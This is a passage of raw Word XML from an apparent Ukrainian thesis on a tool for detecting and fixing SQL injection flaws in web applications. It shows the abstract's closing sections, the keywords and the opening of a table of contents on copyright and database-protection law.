        </w:rPr>
        <w:t xml:space="preserve"> основного тексту, 14 рисунків,  </w:t>
      </w:r>
      <w:r w:rsidR="003041CE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00466851">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> сторінки додатків. Список використаних джерел містить 40 найменувань і займає 4 сторінки. Загальний обсяг роботи </w:t>
      </w:r>
      <w:r w:rsidR="00603AE5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>92</w:t>
      </w:r>
      <w:r w:rsidR="00466851">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> сторін</w:t>
      </w:r>
      <w:r w:rsidR="00603AE5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ки</w:t>
      </w:r>
      <w:r w:rsidR="00466851">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE8462E" w14:textId="73F0F670" w:rsidR="009F1C8E" w:rsidRDefault="009F1C8E" w:rsidP="009F1C8E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Метою роботи є розробка інструменту, який допомагає виявити </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009F1C8E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкції і містить в собі рекомендації по їх усуненню.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2B11AE" w14:textId="1EF79D55" w:rsidR="00DA4C15" w:rsidRDefault="00DA4C15" w:rsidP="00DA4C15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Предмет дослідження</w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007D796A" w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> вразливий веб-додаток</w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACF6C6D" w14:textId="25A3FB97" w:rsidR="00445908" w:rsidRPr="007D796A" w:rsidRDefault="00445908" w:rsidP="00DA4C15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Об’єкт дослідження</w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007D796A" w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> виявлення SQL-ін’єкцій і їх усунення.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08A3D2" w14:textId="69D01D24" w:rsidR="00445908" w:rsidRDefault="00445908" w:rsidP="00DA4C15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Тема роботи є актуальною з огляду на те, що р</w:t>
      </w:r>
      <w:r w:rsidRPr="00445908">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>оль сайтів та їх вплив на бізнес постійно зростає, а перенасичений ринок некваліфікованих веб-програмістів, згубно впливає на безпеку програмних продуктів і сайтів зокрема. Таким чином, актуальність забезпечення захисту інформації від SQL-ін’єкцій пов’язана з широким використанням баз даних на сайтах та у веб-додатках, які можуть бути скомпрометовані кібер-злочинцями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADEF52F" w14:textId="2F4DB3E2" w:rsidR="00445908" w:rsidRDefault="00445908" w:rsidP="00DA4C15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008306C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Наукова новизна дослідження полягає в наступному:</w:t>
      </w:r>
      <w:r w:rsidR="007D796A" w:rsidRPr="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>вперше</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> р</w:t>
      </w:r>
      <w:r w:rsidRPr="00445908">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">озроблено веб-додаток, який містить у собі інструменти для ручного і автоматичного тестування веб-додатків, які є клієнтом сервера баз даних. Також розроблений інструмент містить в собі рекомендації, </w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">за рахунок яких </w:t>
      </w:r>
      <w:r w:rsidRPr="00445908">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>розробник</w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>и можуть</w:t>
      </w:r>
      <w:r w:rsidRPr="00445908">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> виправити вразливість в коді.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A176A72" w14:textId="73525C79" w:rsidR="00445908" w:rsidRPr="00445908" w:rsidRDefault="00445908" w:rsidP="00DA4C15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Практичне значення роботи полягає у тому, що р</w:t>
      </w:r>
      <w:r w:rsidRPr="00445908">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">озроблено </w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>програмне забезпечення</w:t>
      </w:r>
      <w:r w:rsidRPr="00445908">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, як</w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00445908">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> допоможе «фахівцям з тестування на проникнення» або розробникам проводити ручне та автоматизоване тестування веб-додатків на наявність SQL-ін’єкцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578C673C" w14:textId="2E4F055F" w:rsidR="00EE2160" w:rsidRDefault="00F33855" w:rsidP="00CA7357">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00EE2160" w:rsidSect="0001493A">
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключові слова: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQL-ІН’ЄКЦІЯ, ВЕБ-ДОДАТОК, ЗАХИСТ ІНФОРМАЦІЇ, ЗАХИСТ БАЗ ДАНИХ, ЗАХИСТ ВІД SQL-ІН’ЄКЦІЙ, МЕТОД, СКАНЕР      ВРАЗЛИВОСТЕЙ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0179E75F" w14:textId="2F9E2F9B" w:rsidR="003A7B15" w:rsidRPr="003A7B15" w:rsidRDefault="003A7B15" w:rsidP="003A7B15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A7B15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ЗМІСТ</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:id w:val="1170372635"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="2B9B9008" w14:textId="032F693C" w:rsidR="00CE4163" w:rsidRPr="00962467" w:rsidRDefault="00CE4163">
          <w:pPr>
            <w:pStyle w:val="ad"/>
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1ECD8FFD" w14:textId="00452288" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="00CE4163">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006C1B63">
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="006C1B63">
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="006C1B63">
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc30433095" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>РОЗДІЛ 1</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_Toc30433095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11</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F199B53" w14:textId="1847EE2C" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433096" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>НОРМАТИВНО-ПРАВОВІ СТАНДАРТИ В ГАЛУЗІ ЗАХИСТУ БАЗ ДАНИХ</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_Toc30433096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11</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2468A4C2" w14:textId="6FDA82AD" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433097" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.1 Авторське право і бази даних</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_Toc30433097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11</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D8565A4" w14:textId="737E960E" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433098" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.2 Актуальність теми</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_Toc30433098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11</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61992323" w14:textId="2E94C42B" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433099" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.3 Міжнародні нормативно – правові угоди</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_Toc30433099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12</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AE5D865" w14:textId="33972CE6" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433100" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.3.1 Бернська конвенція</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_Toc30433100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12</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EAB7CFF" w14:textId="525C325A" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433101" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.3.2 Угода ТРІПС</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_Toc30433101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13</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43E72877" w14:textId="619E3926" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433102" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.3.3 Договір ВОІВ з авторського права</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_Toc30433102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14</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16083161" w14:textId="75E860F6" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433103" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.3.4 Директива ЄС 96/9/ЄС</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_Toc30433103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16</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="535B090A" w14:textId="06DC99A4" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433104" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.4 Законодавство України в галузі  права інтелектуальної власності</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_Toc30433104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19</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6676A450" w14:textId="0064A05B" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433105" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.4.1 Закон України « Про авторське та суміжні права»</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_Toc30433105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21</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
